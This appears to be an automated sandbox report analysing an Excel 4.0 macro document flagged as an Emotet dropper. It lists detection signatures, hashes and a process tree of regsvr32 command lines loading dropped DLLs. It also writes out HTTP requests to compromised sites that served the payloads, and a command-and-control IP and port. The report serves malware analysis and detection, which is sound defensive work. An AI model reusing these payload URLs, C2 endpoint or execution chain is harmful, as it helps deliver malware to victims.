Windows Analysis Report
DETAILS 25922194612.xls

Overview

General Information

Sample Name: DETAILS 25922194612.xls
Analysis ID: 632071
MD5: 3cfaa4009799dc19f12161241bbf7b03
SHA1: f36b5b095c84f4cf7e01eaf23de008a3362843a8
SHA256: 96eaa313abb56196eea9e8c4c20f78166b79894652e1cff740729d17aace22f0
Tags: SilentBuilder, xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1200 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2552 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1832 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1472 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1680 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1956 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1972 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1424 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2076 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
No configs have been found

Source  Rule  Description  Author  Strings
0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security

Source  Rule  Description  Author  Strings
10.2.regsvr32.exe.2c0000.0.unpack  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
3.2.regsvr32.exe.300000.0.raw.unpack  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
10.2.regsvr32.exe.2c0000.0.raw.unpack  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
9.2.regsvr32.exe.150000.0.unpack  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security
5.2.regsvr32.exe.3e0000.0.unpack  JoeSecurity_Emotet_1  Yara detected Emotet  Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
Source: http://learnviaonline.com/wp-admin/qGb/ Avira URL Cloud: Label: malware
Source: http://milanstaffing.com/images/D4TRnDubF/ Avira URL Cloud: Label: malware
Source: http://kolejleri.com/wp-admin/REvup/ Avira URL Cloud: Label: malware
Source: kolejleri.com Virustotal: Detection: 11%
Source: milanstaffing.com Virustotal: Detection: 6%
Source: learnviaonline.com Virustotal: Detection: 8%
Source: stainedglassexpress.com Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr1.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr2.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr3.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr4.ocx Metadefender: Detection: 28%
Source: C:\Users\user\uxevr4.ocx ReversingLabs: Detection: 60%
Source: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) Metadefender: Detection: 28%
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr3.ocx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr1.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr4.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr2.ocx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,9_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,11_2_000000018000BEF0

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Jf8[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic DNS query: name: learnviaonline.com
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: Joe Sandbox View ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE
Source: Joe Sandbox View IP Address: 103.171.181.223
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 23 May 2022 07:10:53 GMT
  Server: Apache
  Cache-Control: no-cache, must-revalidate
  Pragma: no-cache
  Expires: Mon, 23 May 2022 07:10:53 GMT
  Content-Disposition: attachment; filename="Jf8.dll"
  Content-Transfer-Encoding: binary
  Set-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/
  Last-Modified: Mon, 23 May 2022 07:10:53 GMT
  Content-Length: 371200
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 23 May 2022 07:11:01 GMT
  Server: Apache
  X-Powered-By: PHP/7.3.33
  Cache-Control: no-cache, must-revalidate
  Pragma: no-cache
  Expires: Mon, 23 May 2022 07:11:01 GMT
  Content-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"
  Content-Transfer-Encoding: binary
  Set-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/
  Last-Modified: Mon, 23 May 2022 07:11:01 GMT
  Content-Length: 371200
  X-Content-Type-Options: nosniff
  Vary: User-Agent
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/7.0.33
  set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/
  cache-control: no-cache, must-revalidate
  pragma: no-cache
  last-modified: Mon, 23 May 2022 07:11:05 GMT
  expires: Mon, 23 May 2022 07:11:05 GMT
  content-type: application/x-msdownload
  content-disposition: attachment; filename="T35PENELLOsp.dll"
  content-transfer-encoding: binary
  content-length: 371200
  date: Mon, 23 May 2022 07:11:05 GMT
  server: LiteSpeed
  vary: User-Agent
Source: global traffic HTTP traffic detected:
  GET /wp-admin/qGb/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: learnviaonline.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /wp-admin/REvup/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: kolejleri.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: stainedglassexpress.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /images/D4TRnDubF/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: milanstaffing.com
  Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 165.22.73.229:8080
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219171060.0000000000368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219212394.00000000004C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeroZe
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enR
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/
                      Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/5v
                      Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/=v
                      Source: regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/KP
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/l
                      Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/
                      Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/.t
                      Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/1o
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/L
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/h
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: unknown | DNS traffic detected: queries for: learnviaonline.com
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180017C8C InternetReadFile, 4_2_0000000180017C8C
                      Source: global traffic | HTTP traffic detected:
                          GET /wp-admin/qGb/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: learnviaonline.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected:
                          GET /wp-admin/REvup/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: kolejleri.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected:
                          GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: stainedglassexpress.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected:
                          GET /images/D4TRnDubF/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: milanstaffing.com
                          Connection: Keep-Alive

                      E-Banking Fraud


                      System Summary

